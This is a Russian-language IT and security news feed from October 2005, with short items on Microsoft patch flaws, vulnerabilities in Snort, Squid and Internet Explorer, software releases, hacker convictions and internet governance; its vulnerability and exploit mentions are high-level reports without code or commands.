Аргентинская секьюрити-команда Argeniss в лице своего основателя и руководителя Cesar Cerrudo выпустила документ (в формате PDF), в котором поведала мировому секьюрити сообществу о том, как Microsoft, выпустив очередные патчи, умудрилась сделать в них же ошибки. Напомним, что речь идёт о патчах MS05-049 (уязвимость в Windows Shell и Windows Web View) и выпущенном в апреле MS05-018 (уязвимость в службе CSRSS). Как отмечала в своём октябрьском выпуске M$ как раз об одной из уязвимостей ей и сообщила Argeniss Security Research Team. В статье обсуждается решение, которое приняла Microsoft для решения проблемы и показывается его (решения) несостоятельность. Примечательно, что, как указано в конце описания, аргентинская компания всё равно более высокого мнения о работе над патчами Microsoft, чем об Oracle.
Статья

23/10/2005 12:46 Эксплоит уязвимости WinRAR
Опубликован эксплоит уязвимости обнаруженной недавно в популярном архиваторе WinRAR. Предназначен для компиляйии в win32-системах.
Эксплоит

23/10/2005 12:03 С 1 января россиянам начнут выдавать загранпаспорта с чипами
С 1 января 2006 года россиянам начнут выдавать загранпаспорта нового поколения, содержащие чипы с информацией о владельце. Указ "Об основных документах, удостоверяющих личность гражданина Российской Федерации за пределами территории Российской Федерации, содержащих электронные носители информации" Владимир Путин подписал 19 октября, сообщает РИА "Новости". По поручению Президента, правительство должно утвердить образец бланков и описания паспортов нового поколения. Изготовление паспортов нового поколения должно начаться не позднее 10 ноября 2005 года, а выдавать их будут поначалу в Калининградской области, а также в загранпредставительствах России в Германии и Литве. После истечения сроков действия старые паспорта будут заменяться по личным заявлениям граждан на документы нового образца. Необходимость введения новых паспортов с электронными носителями информации обусловлена резкой активизацией мероприятий по борьбе с международным терроризмом и незаконной миграцией, проводимых мировым сообществом, в первую очередь, странами-участницами "большой восьмерки". Сжатые сроки, установленные Президентом России для введения новых загранпаспортов, диктуются тем, что через год большинство развитых стран перейдет к электронным паспортам.
Источник

23/10/2005 11:30 Будущее браузера Galeon
Разработчики браузера Galeon встретились на саммите Gnome'а и обсудили будущее своего проекта, cообщает linux.org.ru. Они пришли к выводу, что необходимо кардинально изменить подход к его развитию, чтобы избежать стагнации. Они решили, что необходимо взглянуть на конкурирующий проект Epiphany в новом свете. Развитие этого проекта, кажется идет в паривльном направлении, но в нем все еще не хватает многих функций, которые есть в Galeon. Благодаря мощному механизму расширений, многие из этих функций можно реализавть в виде плагинов. Другие же, рациональней включить в ядро. Таким образом, разработчики договорились выпустить Galeon 2.0 и обновлять его, по мере выхода новых версий Mozill'ы, но основные усилия сконцентрировать на новом проекте набора расширений для Epiphany. Не исключается и создание патчей, которые можно будет включать в ядро.
Подробности

23/10/2005 10:58 Взломан сайт Национальной организации русских мусульман
В минувший четверг сайт Национальной организации русских мусульман (НОРМ) Правоверие.Орг был взломан хакерами. Пользователя встретила хулиганская надпись, оповещающая о том, что взлом явился частью некоей акции «Антихачи», нацеленной на уничтожение сайтов исламских организаций. Кроме того, хакер выражал свое неудовольствие тем, что русские принимают «религию черных». Как нам сообщили в редакции Правоверие.Орг, ранее ресурс неоднократно подвергался засорению, были и попытки взлома форума этого сайта со стороны неизвестного хакера из «Израиля». Кроме того, в последние дни были разрушены и некоторые другие русскоязычные мусульманские сайты.
Источник

23/10/2005 10:40 Вышел Netscape версии 8.0.4
Обновился некогда популярный web-браузер Netscape. Его особенностью является использование двух "движков" для отображения страниц – Firefox и Internet Explorer. Пользователь имеет возможность выбрать для использования любой из них. По замыслу разработчиков, это должно помочь в просмотре страниц, оптимизированных под какой-то конкретный браузер. Браузер Netscape является бесплатным. В списке изменений и улучшений значатся: включение всех исправлений ошибок для Firefox версии 1.0.7, улучшенная поддержка работы с proxy-серверами, наличие встроенного проигрывателя Flash версии 8.0.
Скачать

22/10/2005 14:05 Компания Microsoft провела вторую встречу с хакерами
Как и планировалось, в штаб-квартире Microsoft в эти дни прошла вторая конференция Blue Hat, на которой "противоборствующие стороны", а именно разработчики ПО Microsoft и, условно говоря, хакеры ("этичные" хакеры, обычно называющиеся "специалистами по информационной безопасности") могли напрямую пообщаться друг с другом. Что характерно, силы были совсем не равные: более 1000 сотрудников Microsoft с одной стороны, и шесть известных специалистов по безопасности, включая известного Дэна Камински, участвовавшего и в прошлом собрании Blue Hat, Дэвида Мэйнора (Internet Security Systems) и других. Со стороны Microsoft участвовали со-президенты подразделения Platforms, Products &Services Джим Оллчин, ещё в прошлый раз произведший большое впечатление на "оппонентов" своей технической осведомлённостью, и Кевин Джонсон, будущий преемник Оллчина. Как известно, Оллчин покидает Microsoft в конце 2006 года. Как сообщает eWeek, разработчикам компании Microsoft снова продемонстрировали ряд уязвимостей их продукции. Например, Мэйнор из ISS показал, как атакующий может использовать USB-устройство для прямой загрузки вредоносного года в память машины под управлением Windows, и задействовать его, используя DMA (Direct Memory Access). Кроме того, приглашённые специалисты обсуждали с руководством корпорации и непосредственными разработчиками вопросы безопасности седьмой версии Internet Explorer, а также средства обеспечения защиты будущей версии Windows Vista. Впоследствии руководители Microsoft заявили, что итоги конференции будут в полной мере использованы для повышения уровня технической осведомлённости работников корпорации, и что Blue Hat будет проводиться снова и снова.
Источник

22/10/2005 13:21 Нигерия будет сажать спамеров в тюрьму
Власти Нигерии намерены принять закон, предусматривающий наказание за рассылку спама. Согласно новому акту, нигерийские спамеры могут оказаться в тюрьме минимум на три года, сообщает Reuters. Наряду со спамом проект закона относит к преступлениям использование компьютеров в мошеннических целях, хищение идентификационных данных, распространение детской порнографии и пропаганду терроризма. Наказанием за эти виды преступлений является лишение свободы на срок от 6 месяцев до 5 лет и штрафы в размере от 10000 до 1 миллиона найр. Авторы законопроекта предлагают считать спамеров любого человека, который отправляет электронные письма ранее незнакомым ему лицам. Провайдеры, содействующие преступникам и отказывающиеся сотрудничать с правоохранительными органами, могут быть оштрафованы на сумму от 500 тысяч до 10 миллионов найр. Печально известная нигерийская афера 419, названная так по номеру статьи уголовного кодекса Нигерии, представляет собой компьютерную версию мошеннической схемы «Испанский узник», появившейся несколько веков назад. Преступники рассылают несколько миллионов спамерских писем, в которых обещают получателям процент от крупной денежной суммы. После того, как потенциальная жертва мошенников вступает с ними в переписку, у авторов нигерийских писем возникает нужда в небольшом по сравнению с основной суммой авансе. Для получения аванса мошенники сообщают жертве номер своего банковского счета. После выплаты аванса мошенники либо исчезают, либо продолжают выманивать у жертвы дополнительные суммы «на непредвиденные расходы».
Источник

22/10/2005 12:59 Новые лицензии Microsoft для исходного кода
Софтверный гигант, уже на протяжении пяти лет распространявший свои технологии посредством Microsoft Shared Source Initiative и соответствующей лицензии Shared Source, решил поменять существующий подход. Теперь все исходные коды Microsoft будут распространяться под тремя различными лицензиями.
Подробности

22/10/2005 11:57 В Британии создадут проект Get Safe Online
Национальное подразделение по борьбе с экономическими преступлениями Великобритании (NHTCU) запускает на следующей неделе проект Get Safe Online, цель которого - научить рядовых пользователей и представителей малого бизнеса осуществлению безопасных онлайновых финансовых операций в Сети. Как утверждают в NHCTU эти две группы - наиболее уязвимы угрозам безопасности. Желание поддержать новый проект выразили ряд крупных компаний - Dell, HSBC, Microsoft и eBay. Последняя будет участвовать в разработке проекта. Общий объем инвестиций в проект составил около 150 тысяч фунтов стерлингов. Get Safe Online начнет свою работу в октябре текущего года. На сайте пользователи найдут информацию о том, как бороться с вирусами, противостоять хакерским атакам и защищать свои личные сведения. Кроме того, сайт будет содержать ссылки на ресурсы, на которых пользователи смогут получить бесплатное антивирусное программное обеспечение и прочий софт для защиты компьютера от внешних атак.
Подробности

22/10/2005 11:38 Первый стабильный релиз открытой ERP системы Sequoia
Объявлено о выходе первого стабильного релиза (v0.8.1) системы для планирования ресурсов предприятия промышленного уровня - Sequoia ERP, сообщает opennet.ru. Sequoia работает как с коммерческими СУБД, такими как Oracle или Sybase, так и с отрытыми - PostgreSQL и MuSQL. Система базируется на другом открытом ERP проекте Open For Business (OFBiz).
Подробности

22/10/2005 10:35 Пульт управления для Xbox 360 работает и с ПК
В среду Microsoft выпустила новый пульт управления для будущей игровой приставки Xbox 360, который работает также и с ПК под Windows ХР. Xbox 360 Controller for Windows будет работать не только с новой игровой приставкой Xbox 360, но и с компьютерами на базе операционной системы Windows XP. «Геймеры смогут просто отсоединить пульт управления от системы Xbox 360 и подключить его к ПК под Windows ХР, — говорится в заявлении директора Microsoft по Windows-играм Криса Донахью. — Это великий прорыв в игровой индустрии, так как мы облегчаем разработчикам создание многоплатформенных игр». Пульт управления отличается новым дизайном с улучшенными эргономическими характеристиками. Кроме того, он оснащен «поддержкой вибрационной отдачи» и набором кнопок. Устройство, продаваемое отдельно, будет содержать драйвер для ПК на базе ХР. Пульт управления, входящий в комплектацию консоли Xbox 360, будет работать с ПК после загрузки драйвера с веб-сайта Microsoft. Трехметровый кабель пульта управления подключается к порту USB. В Северной Америке устройство уже продается за $39 и скоро поступит в продажу в Европе и Азии. Xbox 360 планируется выпустить ко Дню благодарения (24 ноября).
Подробности

22/10/2005 10:26 Конгресс США рекомендует не отдавать Интернет "нестабильным парням"
Американские конгрессмены порекомендовали исполнительной власти США противостоять попыткам отдать Интернет под международный контроль. Этот вопрос, как сообщает Reuters, обсуждался на заседании американского Сената в четверг, в результате была вынесена соответствующая резолюция. Как известно, вопрос о передаче юридических полномочий по контролю за централизующими функциями глобальной компьютерной сети подняли некоторые страны-члены ООН в преддверии саммита ООН по информационному сообществу (WSIS), который будет проходить в ноябре в Тунисе. На нем будет обсуждаться то, как меняется мир в условиях современной информационной обстановки, одну из важнейших ролей в которой играет Интернет. Сейчас формально право решающего голоса в процессах распределения доменов и IP-адресов в Сети имеет Министерство торговли США, которое обладает правом вето на решения международного управляющего органа ICANN, фактически занимающегося этими вопросами. Представители ряда стран, в числе которых Китай, Бразилия, ЮАР, Иран, Саудовская Аравия, Норвегия, Швейцария и Россия, выступают за передачу Интернета под контроль какого-либо особого органа при ООН, на который могли бы влиять страны-члены этой организации. США уже неоднократно выражали несогласие с этой позицией, аргументируя это тем, что нет смысла менять существующее положение вещей: Интернет является важной частью международной экономики и работает стабильно (основная часть корневых DNS-серверов находится в ведении американских компаний и вузов), изменения в структуре управления могут поставить эту стабильность под сомнение. США поддержала Великобритания.
Подробности

21/10/2005 11:58 Очередной конфуз с патчами Microsoft
Корпорация Microsoft опубликовала еще одно уведомление о проблеме, которая может возникнуть в ходе установки недавно выпущенных обновлений для операционных систем Windows. Новая проблема, как сообщается, приводит к тому, что при попытке загрузки заплатки для уязвимости в компоненте DirectShow компьютер так и остается непропатченным. Происходит это, если пользователь Windows 2000 вручную пытается инсталлировать апдейт для DirectX 7.0, а на компьютере на самом деле установлен DirectX 8.0 или DirectX 9.0. В этом случае система обновлений не выдает никаких предупреждений об ошибке, хотя дыра так и остается открытой. Как отмечает CNET News со ссылкой на заявления Брайана Грэйека, эксперта компании Preventsys, пользователи могут скачать не тот патч из-за того, что в соответствующем бюллетене Microsoft содержатся не совсем ясные указания. Между тем, для проведения атаки через дыру в модуле DirectShow достаточно вынудить жертву открыть специально созданный файл в формате AVI, обработка которого спровоцирует ошибку переполнения буфера и последующий запуск произвольного вредоносного кода.
Описание

21/10/2005 11:33 Маршрутизаторы InfiNet Wireless для интеграции сетей SkyMAN
Компания InfiNet Wireless сообщила о начале производства новых моделей беспроводных маршрутизаторов, предназначенных для интеграции беспроводных сетей SkyMAN диапазонов 2,4 и 5 ГГц. Новые модели выполнены на усовершенствованной аппаратной платформе абонентских устройств серий L и S. В состав серии включены устройства, обеспечивающие в диапазоне 5 ГГц передачу на скоростях до 18 и 24 Мбит/с соответственно и прием на скоростях до 54 Мбит/с, а в диапазоне 2,4 ГГц - прием и передачу на скоростях до 11 Мбит/с. В диапазоне 5 ГГц устройства полностью совместимы с существующим оборудованием системы SkyMAN. В диапазоне 2,4 ГГц устройства поддерживают работу только с новыми моделями оборудования SkyMAN этого диапазона. Новые устройства разработаны для операторов, имеющих разрешения на использование частот диапазонов 2,4 и 5 ГГц и предназначены для подключения к сети одного диапазона абонентов другого диапазона.
"Открытые системы"

21/10/2005 10:30 Вышел OpenOffice 2.0
Новая версия бесплатного делового инструментария, хоть и с опозданием из-за выявленных ошибок, но вышла и доступна для загрузки. В четверг программисты выпустили версию 2.0 OpenOffice.org, капитального обновления набора деловых программ с открытым исходным кодом, который в последнее время стал более серьезным конкурентом Microsoft Office. OpenOffice включает текстовой процессор, электронную таблицу, программу для создания презентаций и — появившуюся в версии 2.0 — базу данных. Организаторы проекта надеялись выпустить новую версию на прошлой неделе, к его пятой годовщине, но обнаруженная в последний момент ошибка нарушила эти планы. На новое ПО возлагаются большие надежды. «OpenOffice.org на пути к тому, чтобы стать самым популярным офисным пакетом в истории», — говорится в заявлении президента Sun Джонатана Шварца. Sun является главным спонсором проекта, но в нем участвуют также Red Hat, Novell, Intel, Propylon и независимые разработчики. Корни OpenOffice лежат в приобретении Sun в 1999 году за $73,5 млн германской компании Star Division, разработавшей офисный пакет StarOffice. Sun сохранила семейство продуктов StarOffice, но в 2000 году сделала его также проектом open source под названием OpenOffice.
Подробности

21/10/2005 10:08 На Google Print снова подали в суд
Пять крупных издательских компаний в США подали в суд на компанию Google, инкриминируя ей нарушение авторских прав при работе над проектом Google Print. Как известно, в рамках этого проекта проводится оцифровка книг из большого числа библиотек, которые попадают в доступную через Интернет базу данных. По текстам всех оцифрованных книг все посетители сайта могут производить поиск, но доступ к книгам, защищенным авторскими правами, заблокирован - выводятся лишь короткие фрагменты, содержащие заданные при поиске слова. Иск подан в суд Южного района Нью-Йорка, истцы требуют прекратить работу проекта в части книг, на которые распространяются чьи-либо авторские права. Истцов поддерживает Ассоциация американских издателей (AAP), глава которой Патрисия Шредер (Patricia Schroeder) в интервью агентству Reuters заявила, что если Google может свободно копировать книги из библиотек, то это с таким же успехом сможет сделать любой желающий.
Подробности

20/10/2005 16:15 В Snort найдена критическая уязвимость
Эксперты по информационной безопасности обнаружили уязвимость в системе обнаружения вторжений Snort, которая позволяет удаленному пользователю выполнить произвольный код на целевой системе. Переполнение буфера существует при обработке Back Orifice пакетов. Удаленный пользователь может послать приложению специально сформированные UDP-пакеты, вызвать переполнение буфера и выполнить произвольный код на целевой системе. «Дыре» присвоен ретинг опасности «критическая». Уязвимы Snort 2.4.0 – 2.4.2. Для использования уязвимости нет эксплойта. Для решения проблемы установите последнюю версию (2.4.3) с сайта производителя.
Источник

20/10/2005 15:30 Уязвимость в Squid
M.A.Young обнаружил уязвимость в популярном прокси-сервере SQUID. Уязвимость связана с ошибкой в коде обработки некоторых ответных сообщений FTP-серверов. Таким образом, можно вызвать отказ удалённого прокси-сервера при посещении снециальным образом настроеных FTP-серверов. Уязвимость присутствует в Squid-2.5 и ниже. Выпущен патч.
Описание

20/10/2005 15:03 ФЦП «Электронная Россия» публикует результаты
Министерство экономического развития и торговли РФ приступило к публикации на своем официальном сайте полученных в ходе выполнения работ по госконтрактам в рамках ФЦП «Электронная Россия» результатов, не попадающих под режим секретности. Об этом, как передает «Прайм-Тасс», сообщил заместитель директора департамента корпоративного управления Минэкономразвития Церен Церенов. «Конечно, результаты научно-исследовательских и опытно-конструкторских работ (НИОКР), не попадающие под режим секретности, теоретически можно найти, но это достаточно сложно. Органы власти считают их своей собственностью и не пытаются раскрывать, при этом результаты не вводятся в хозяйственный оборот, что сдерживает развитие экономики в целом, — отметил Ц.Церенов. — Важно распространить опыт публикации НИОКР на все органы власти». По словам Ц.Церенова, департамент должен представить в 4 квартале 2005 г предложения по поводу распространения этого проекта по всем ведомствам Минэкономразвития. Ц.Церенов также добавил, что Министерство промышленности и энергетики РФ и Министерство образования и науки РФ ведут работу по созданию единого реестра результатов всех научно-исследовательских и опытно-конструкторских работ (НИОКР), выполненных по заказу государства. По его словам, ориентировочно такой реестр можно будет, «по крайней мере, в технологическом отношении», создать в течение года.
Подробнее

20/10/2005 13:32 AOL сокращает штат по обслуживанию дайлапщиков
Компания America Online, один из крупнейших американских интернет-провайдеров, увольняет 700 сотрудников, сообщает агентство Associated Press. Согласно заявлению AOL, такой шаг вызван продолжающимся снижением количества пользователей, подключающихся к сети по коммутируемой линии (dial-up). Увольнение затронет в основном тех работников компании, которые работают в центрах телефонного обслуживания абонентов в штатах Флорида, Аризона и Виргиния.
Подробности

20/10/2005 12:15 Шпионское ПО атакует малый бизнес
87% корпоративных конечных пользователей знают о существовании шпионского ПО, но 57% утверждают, что они нуждаются в дополнительном обучении со стороны ИТ-служб, чтобы лучше понять опасность spyware. Такие данные были получены в результате исследования, проведенного в США, Германии и Японии компанией Trend Micro, производителем антивирусного ПО. В интерактивном опросе принимали участие 1200 конечных пользователей из компаний самого разного масштаба - от транснациональных корпораций до компаний малого бизнеса с единственным офисом. На практике с программами-шпионами сталкивались 40% респондентов в США, 23% опрошенных в Германии и 14% пользователей в Японии. Во всех трех странах представители малого и среднего бизнеса подвергаются вредоносным атакам чаще, чем работники крупных предприятий. Конечные пользователи в США в пять раз более подвержены угрозе стать жертвой вредоносного ПО, чем их коллеги в Японии и в Германии. Около 40% участников опроса, работающих в компаниях, в которых имеются ИТ-службы, убеждены в том, эти службы могут предпринимать больше усилий, чтобы защитить их от программных атак. Однако только 45% опрошенных, которые столкнулись со шпионским ПО в процессе работы, считают, что они действительно стали его жертвами.
Источник

20/10/2005 11:53 "Доктор Веб" выпустил новую версию Dr.Web Enterprise Suite
Компания «Доктор Веб» — российский разработчик средств антивирусной безопасности — сообщает о выходе версии 4.33 антивирусного продукта для защиты корпоративных сетей Dr.Web Enterprise Suite. Новая версия корпоративного продукта компании «Доктор Веб» несет в себе усовершенствования, произведенные в основных компонентах антивируса Dr.Web версии 4.33, которая была выпущена 27 сентября 2005 года. Таким образом, всем пользователям нового сетевого продукта будут доступны антивирусное ядро версии 4.33, включающее в себя переработанный эвристический анализатор, способный обрабатывать большое количество различных упаковщиков, и новые вирусные базы, позволяющие детектировать шпионские и рекламные программы, а также иные виды нежелательного кода.
Источник

20/10/2005 11:41 Sun выпускает Jini по лицензии open source
В среду Sun Microsystems предложила свой инструмент разработки Jini по лицензии open source Apache. Jini появился в 1999 году как способ установления связи между потребительскими устройствами и программным обеспечением Sun Java. Но компании, использующие ПО Jini, применяли его главным образом для решения корпоративных задач, таких как распределенные вычисления и соединение серверов в кластеры. Это ПО отлично подходит для создания Java-приложений, которые опираются на широко распределенные компоненты. Например, Sun использует Jini в своем программном обеспечении радиочастотной идентификации, которое работает в миниатюрных считывателях RFID для складов. Разработкой программного обеспечения Jini занимается Jini Community, независимое сообщество, в котором участвуют Sun и другие компании. В среду на конференции Jini Community в Чикаго руководители Sun объявили, что Jini Technology Starter Kit версии 2.0 доступен по лицензии Apache License 2.0. Принятие лицензии Apache — часть плана Sun по превращению Jini Community в аналог сообщества open source. Пользующаяся большой популярностью предыдущая версия Jini Starter Kit 1.2 также будет сделана доступной по лицензии open source.
Подробности

20/10/2005 11:19 В Челябинской области поймали очердного хакера
По факту незаконного доступа к компьютерной информации возбуждено уголовное дело сотрудниками отдела по борьбе с экономическими преступлениями в городе Миасс Челябинской области. Как сообщили агентству "Урал-пресс-информ" в ОБЭПе, это уже четвертое дело, связанное с неправомерным проникновением к компьютерной информации. На этот раз уличен молодой человек, студент одного из миасских вузов. Используя чужой пароль, он выходил в сеть интернет. Ущерб понесли частные лица и организации, размер ущерба устанавливается. За подобное преступление уголовным кодексом предусмотрено наказание в виде лишения свободы сроком до пяти лет. По словам сотрудников ОБЭПа, доступные им средства и методы позволяют и впредь выявлять воров и грабителей компьютерной информации.
Источник

20/10/2005 10:44 Microsoft представила в России Windows XP Media Center Edition 2005
В среду компания Microsoft провела российскую презентацию своей операционной системы Windows XP Media Center Edition (MCE) 2005, предназначенной для работы со всеми типами медиаматериалов. Система, построенная на базе Windows XP, была локализована компанией для использования российскими пользователями и презентация была призвана продемонстрировать ее новые возможности. По сообщению Microsoft, новая система расширяет возможности для работы с телевидением и радио, позволяет работать с фото- и видеоизображениями и широко использовать ресурсы Интернета. На презентации в Москве генеральный директор подразделения OEM Worldwide Marketing Кевин Иган (Kevin Eagan) сказал: "Важно не просто научиться управлять цифровыми технологиями, но и получать от процесса максимум удовольствия, особенно если это касается информационных технологий сферы развлечений. Современные технологии помогают нам отдыхать, общаться и, более того, они позволяют нам с головой окунуться в совершенно иную реальность. Теперь с помощью Media Center Edition 2005 и российские пользователи смогут легко управлять любимыми цифровыми развлечениями". Планируется, что русскоязычная версия системы будет поставляться на российский рынок в комплекте с готовыми компьютерами российских сборщиков ПК (OEM). Система совместима с мультимедиа-оборудованием, поддерживаемым партнерами Microsoft, теперь она будет входить в комплект поставки ряда готовых решений.
Источник

20/10/2005 10:05 Осуждены члены британской хакерской группы "Thr34t-Krew"
Компания ДиалогНаука сообщает, что Эндрю Харвей (Andrew Harvey) и Джордан Брэдли (Jordan Bradley), члены британской хакерской группы "Thr34t-Krew", распространявшие вредоносный код для удаленного контроля над ПК пользователей по всему миру, приговорены к тюремному заключению. Вирусописатели получили шесть и три месяца тюрьмы соответственно. 24-летний Харвей и 22-летний Брэдли признались, что в период с 31 декабря 2001 по 7 февраля 2003 имели тайный сговор с целью проникновения и модификации ПК без разрешения владельцев компьютеров. Ими была создана троянская программа TKBot-A. С ее помощью и без ведома невинных владельцев компьютеров, они управляли подключенными к интернету ПК. Попав под хакерский контроль, зараженные компьютеры могли выполнять разные команды от удаленных хакеров, например, искать уязвимости в других ПК и запускать DDOS-атаки против каких-то веб-сайтов. Судья Беатриса Болтон (Beatrice Bolton) сказала, что эти тюремные заключения послужат предупреждением для других вирусописателей. В мае за аналогичное преступление 21 месяц тюремного заключения получил американский член рассматриваемой преступной группы. Тогда сообщалось, что вредоносный код проник также и на компьютер в Министерстве обороны США.
Источник

19/10/2005 15:53 «Open Source» — бесплатное электронное приложение
В России открывается бесплатное электронное издание, полностью посвященное тематике программного обеспечения с открытым кодом, — «Open Source». «Open Source» является приложением к журналу «Системный администратор», которое будет регулярно (каждые 3 недели) издаваться и свободно распространяться в виде файлов PDF. Тематика электронного издания охватывает все сферы применения и использования ПО с открытым кодом — это может быть, например, как аналитическая статья, посвященная Free Software, так и обзор нового Linux-дистрибутива или небольшое руководство по работе с какой-нибудь свободной утилитой. Приветствуются все желающие опубликовать свои материалы в «Open Source». Требования к авторам просты: знания рассматриваемой области и умение доступно подавать мысли читателям. Ориентировочное время первого выпуска приложения «Open Source» — начало ноября. Тестовая версия сайта и контакты для авторов доступны по адресу osa.samag.ru.
Сайт проекта

19/10/2005 15:29 Проекту OpenBSD исполнилось 10 лет
18 октября проекту OpenBSD исполнилось 10 лет. 10 лет прошло с того момента как Theo de Raadt'у был закрыт доступ к CVS репозиторию NetBSD, в результате чего появилась новая операционная система, сообщает opennet.ru.
Подробности

19/10/2005 14:24 Cisco вводит в действие новую защиту от вирусов
Компания Cisco Systems представила обновленную версию системы Network Admission Control (NAC), предназначенную для укрепления защиты корпоративных сетей от вредоносных программ, сообщает сайт vnunet.com. NAC проверяет машины пользователей, подсоединенных к системе на предмет установки последних антивирусных обновлений и патчей. Если одно из условий (последняя версия антивирусной программы или установка необходимых патчей) не выполнены, система блокирует пользователю доступ к сети и направляет его в клиентский раздел, из которого можно установить все необходимые обновления. В отличие от обычных продуктов, предназначенных для защиты информационных сетей, NAC идентифицирует пользователя не по логину и паролю, а определяя тип устройства, подключенного к сети. Таким образом, доступа к корпоративной сети лишаются сотрудники, подключающиеся с домашних компьютеров. Кроме того, система исключает проникновение в сеть вредоносных программ с переносных компьютеров временных сотрудников, например, консультантов. Обновленная версия NAC переносит функцию идентификации с сервера на внутрисетевые свитчи. Это поможет организация пресекать вирусные эпидемии на ранних стадиях, заявил технический директор Cisco Боб Глейчоф (Bob Gleichauf). «Множество вирусных эпидемий зарождаются в корпоративных сетях, защищенных межсетевыми экранами, когда вы приходите и подключаете к сети свой лэптоп», — отметил Глейчоф. Для того, чтобы запустить NAC на свитчах и точках беспроводного доступа, необходимо обновить уже работающий софт Cisco. Новые обновления, как правило, входят в стоимость уже действующего контракта.
Источник

19/10/2005 13:25 Автор вируса принес свои извинения
Совсем недавно игровые консоли Nintendo и Sony стали жертвой вируса. В Sony PSP, которая была заражена первой, распространялся файл, якобы являющийся системным обновлением. После установки он уничтожал программную прошивку консоли, чем полностью выводил девайс из строя. Позднее аналогичный вирус поразил Nintendo DS, он маскировался под программу для просмотра хентая. На днях создатель вируса решил, что пора извиниться за содеянное. На своем сайте некто под ником Dark Fader объявил, что берет на себя всю ответственность за создание и распространение вируса. Хакер отметил, что его целью были не обыкновенные пользователи, а так называемые ROM-пираты (игроки, заинтересованные в использовании "самодельного" софта в незаконных целях ). "Я бы хотел извиниться перед всеми. Я должен был раньше осознать последствия моих действий и предугадать, что результатом станут не несколько сломанных консолей, а сотни. Если кому-то не нужны мои извинения, то мне все равно, потому что это значит, что вы - очередной ROM-пират. Я не пытаюсь оправдаться и признаю, что привлечение внимания к проблеме подобным путем было эгоистичным и необдуманным поступком", - написал автор вируса. Попутно, Dark Fader предостерег пользователей от запуска на своих устройствах неизвестных программ. "Я не утверждаю, что нужно полностью отказаться от использования "самодельных" программ, однако ни DS, ни PSP для этого не предназначены, поэтому делать это можно лишь на свой страх и риск. Если на то есть необходимость, то лучше использовать софт от источника, которому вы полностью доверяете. Доверие - вещь относительная, однако я бы не разместил на своём сайте опасное программное обеспечение. Вы можете мне не верить, но я ведь мог и вовсе не сообщать о своем авторстве по отношению к тем вирусам". Кроме того, на сайте Dark Fader'а размещены ссылки на несколько утилит, способных помочь восстановить поврежденные консоли.
Источник

19/10/2005 13:04 Уязвимости в Windows Media Player и Internet Explorer
eEye Digital Security сообщает об обнаружении новых уязвимостей в программном обеспечении Microsoft. На этот раз они обнаружены в медиаплеере Windows Media Player и браузере Internet Explorer. По информации eEye, проблема проявляется на операционных системах Windows XP (в том числе с SP2), Windows NT, Windows 2003 (c SP1) и всех версиях Windows 2000 при использовании медиаплеера и IE с настройками по умолчанию. Злоумышленник теоретически может получить полный доступ к удаленному компьютеру и выполнить на нем произвольный программный код с привилегиями текущего пользователя. Для реализации атаки нужно вынудить жертву открыть сформированный специальным образом файл или посетить вредоносную веб-страницу в интернете. Более подробная информация об уязвимостях, получивших рейтинг критических, из соображений безопасности не разглашается. Корпорация Microsoft уже поставлена в известность о проблеме и занимается ее изучением, отмечает CNET News. При этом представители Microsoft подчеркивают, что случаев практического использования дыр на сегодняшний день зафиксировано не было. Кстати, в браузере Internet Explorer, по данным датской компании Secunia, остаются открытыми, по крайней мере, еще двадцать уязвимостей, многие из которых позволяют выполнять вредоносный код на ПК вез ведома его владельца.
Подробное описание

19/10/2005 12:31 Казино защищаются от DoS-атак
Оператор интернет-казино, Bet365, заявил о внедрении новой технологии борьбы с распределенными атаками "отказ в обслуживании" (DDoS). Технология была приобретена у специалиста по анализу работы сети, компании WildPackets. Программа, первоначально написанная для Mac, анализирует атаку не по количеству пакетов, а по их содержимому. Онлайновые казино терпят огромные убытки вследствие отключения их от сети хакерами, организующими DoS-атаки с требованием оплаты за прекращение. Современные межсетевые фильтры и защитные программы не спасают от распределенных нападений, когда десятки тысяч разных компьютеров-зомби обращаются к серверу, нарушая его работу. Программа Omni была создана WildPackets для обнаружения замедления сетевого трафика и поиска виновников. Она анализирует содержимое пакетов в реальном времени. При резком увеличении трафика программа может определить, что это атака и заблокировать конкретные адреса, сообщил Inquirer.
CNews

19/10/2005 12:00 Разработано средство против хакерских атак
Представители компании UltraDNS сделали амбициозное заявление о том, что разработанная ими система позволяет очень эффективно отражать атаки типа "отказ от обслуживания". Корпорация UltraDNS разработала новую систему защиты, которая сможет защитить её клиентов от так называемых DoS-атак, которые проводятся хакерами с помощью нескольких десятков тысяч «компьютеров-зомби». Атаки denial-of-service используются для того, чтобы перегрузить сайты или компьютерные системы своих жертв. Их может провести любой человек и из любой точки земного шара, передает Reuters. Аналитики называют новую систему компании UltraDNS шагом вперёд в защите от DoS-атак. Система обрабатывает запросы лишь аутентифицированных пользователей, что позволят в случае атаки отсечь ненужный поток данных. Серверы UltraDNS, осуществляющие подобный контроль, предлагается установить у всех интернет-провайдеров. UltraDNS является крупнейшим провайдером, обеспечивающим DNS-сервис в таких доменных зонах, как .org, .uk, .info. Заключив партнёрские соглашения с двумя крупнейшими американскими провайдерами — Earthlink и America Online, — UltraDNS собирается запустить систему DNS Shield, которая, по словам компании, сможет обеспечить надёжную защиту от хакеров.
Источник

19/10/2005 11:43 Выпущена пятая версия СommuniGate Pro
Компания CommuniGate Systems объявила о выходе CommuniGate Pro v5.0 - единого решения для передачи сообщений, организации совместной работы и передачи голоса через Internet. В новой версии продукта представлены голосовые приложения, реализованные в рамках кластерной платформы CommuniGate Pro. Эта платформа обеспечивает работу SIP Farm, которая дает возможность обслужить тысячи Internet-доменов и миллионы подписчиков с надежностью 99,999%. CommuniGate Pro v5.0 - комплексная система, включающая в себя такие VoIP приложения, как сервер телеконференций, автосекретарь (IVR), управление очередями вызовов и автоматическое распределение звонков (ACD), а также инструменты для работы с голосовой почтой. Все приложения реализованы в рамках расширяемой голосовой платформы и предоставлены с исходным кодом, что позволяет интеграторам гибко настраивать приложения под конкретного клиента, расширяя и модифицируя их функциональность.
"Открытые системы"

19/10/2005 11:21 IBM пробует серверный подход к корпоративным ПК
